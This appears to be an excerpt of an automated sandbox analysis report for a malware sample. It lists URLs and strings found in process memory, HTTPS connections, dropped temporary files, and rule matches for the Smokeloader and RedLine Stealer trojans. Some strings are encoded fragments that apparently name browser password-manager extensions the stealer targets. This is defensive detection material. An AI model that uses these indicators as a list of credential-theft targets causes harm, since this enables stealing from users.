Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comFIXUP_FLAG_PRIVATE_CONTEXTFIXUP_FLAG_FORCE_ALTERNATE_URIexternalProtocol
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.comPage
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelObserver
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CE8000.00000004.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.comcreateContentPrincipalFromOriginremoveTabsProgressListenerchrome://bro
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/resource://gre/modules/Log.sys.mjsipc:first-content-process-
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000028.00000002.2884438644.000002618E7A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F10F000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CE8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61283 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61302 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File created: C:\Users\user\AppData\Local\Temp\Tmp7452.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File created: C:\Users\user\AppData\Local\Temp\Tmp73F3.tmp Jump to dropped file

System Summary

Source: 00000000.00000002.2419937353.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2420085269.00000000026BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
